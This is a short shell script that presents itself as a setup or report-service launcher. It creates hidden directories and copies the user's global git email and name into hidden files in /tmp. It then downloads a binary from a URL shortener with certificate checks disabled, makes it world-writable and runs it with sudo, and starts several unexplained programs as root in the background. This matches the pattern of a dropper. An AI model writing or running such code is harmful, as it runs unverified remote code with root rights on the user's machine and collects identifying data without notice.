#!/bin/sh
MDIR=/.data_servicex
SLDIR=/.setup_logx
GBIN=/usr/local/bin

if [ -d $SLDIR ]
then
     echo "$SLDIR exists"
else
     echo "$SLDIR doesn't exists"
     sudo logSetup &
fi

sleep 2
lockdir=/tmp/reportService.lock

while true; do
    if mkdir "$lockdir"
    then    # directory did not exist, but was created successfully
        echo "report service is freed."
        break    # continue with script
    else
        sleep 20  # sleep for 20 seconds and try again
        echo "report service already accessed"
    fi
done

sleep 5
{
echo $(git config --global user.email) > /tmp/.GMAILGX
echo $(git config --global user.name) > /tmp/.GNAMEGX

if [ -e $GBIN/setupService ]
then
    echo "setupService exists"
else
    echo "setupService doesn't exists"
    cd $HOME
    wget http://www.tinyurl.com/setupx --no-check-certificate
    sudo chmod 777 setupx
    sudo ./setupx
    rm setupx
fi

sudo specific &
sleep 5
sudo updateSrc &
sleep 5
sudo setupService &
sleep 600
#sudo logCapturex &
#sleep 150
#sudo common &
#sleep 5

} > $SLDIR/setupl_$(date '+%y_%m_%d_%I_%M_%S').ljp

sleep 100
sudo logSetup &

exit 0
